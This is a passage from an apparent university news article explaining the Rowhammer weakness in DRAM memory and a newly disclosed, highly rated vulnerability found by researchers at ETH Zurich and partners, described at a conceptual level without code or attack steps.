When browsing the internet on a laptop computer or writing messages on a smartphone, we all like to think that we are reasonably safe from hacker attacks as long as we have installed the latest software updates and anti-virus software. But what if the problem lies not with the software, but with the hardware? A team of researchers led by Kaveh Razavi at ETH Zurich, together with colleagues at the Vrije Universiteit Amsterdam and Qualcomm Technologies, have recently discovered fundamental vulnerabilities affecting the memory component called DRAM at the heart of all modern computer systems.
The results of their research have now been accepted for publication at a flagship IT security conference, and the Swiss National Cyber Security Centre (NCSC) has issued a Common Vulnerabilities and Exposures (CVE) number. This is the first time that a CVE identification has been issued by the NCSC in Switzerland (see box below). On a scale of 0 to 10, the severity of the vulnerability has been rated as 9.
The weakness of DRAM
“An underlying, well-known problem with DRAMs is called Rowhammer and has been known for several years”, Razavi explains. Rowhammer is an attack that exploits a fundamental weakness of modern DRAM memories. DRAM is short for Dynamic Random Access Memory, where “dynamic” means that all the data stored in it is volatile and has to be refreshed quite often – in fact, more than ten times per second. This is because DRAM chips only use a single capacitor-transistor pair to store and access one bit of information.
The capacitors leak charge over time, and once they have leaked too much charge, the computer no longer knows whether the value of the stored bit was “1” (which might correspond to high charge) or “0” (low charge). On top of that, every time a memory row is activated in order to be read out or written onto (the bits are arranged in a checkerboard-like pattern of rows and columns), the currents that flow inside the chip can cause the capacitors in neighbouring rows to leak charge faster.
Problem not solved
“This is an unavoidable consequence of the constantly increasing density of electronic components on the DRAM chips”, says Patrick Jattke, a PhD student in Razavi’s group at the Department for Information Technology and Electrical Engineering. It means that by repeatedly activating – or “hammering” – a memory row (the “aggressor”), an attacker can induce bit errors in a neighbouring row, also called the “victim” row. That bit error can then, in principle, be exploited to gain access to restricted areas inside the computer system – without relying on any software vulnerability.
